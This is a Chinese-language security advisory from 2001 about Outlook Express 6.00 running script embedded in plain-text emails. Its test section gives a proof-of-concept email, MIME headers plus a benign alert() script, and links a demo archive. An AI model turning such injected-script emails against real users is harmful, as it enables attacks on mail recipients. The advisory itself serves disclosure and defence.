发布日期：2001-09-12
更新日期：2001-09-14

受影响系统：

Outlook Express 6.00
  - Microsoft Windows 9x
  - Microsoft Windows NT 4.0
  - Microsoft Windows 2000

描述：

---

Outlook Express是微软公司开发的集邮件收发和新闻组等多种功能于一体的软件。

正常情况下，只有html邮件[Content-Type: text/html]才会解析html和脚本代码。但是
在最新推出的Outlook Express 6.00中，纯文本邮件中如果加入了脚本代码，它们也会被
解释执行。

缺省情况下，Outlook Express 6.00禁止脚本执行，因此缺省情况下用户不会受此问题
影响。

<*来源：http-equiv (http-equiv@excite.com)
  链接：http://archives.neohapsis.com/archives/bugtraq/2001-09/0108.html
*>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

发送下列的纯文本邮件也会导致执行脚本：

MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Source: 11.09.01 http://www.malware.com


<script>alert("freak");alert("show")</script>

http-equiv@excite.com也提供了一个演示程序：
http://www.malware.com/malware.zip



建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本。
http://www.microsoft.com


浏览次数：4271
严重程度：0（网友投票）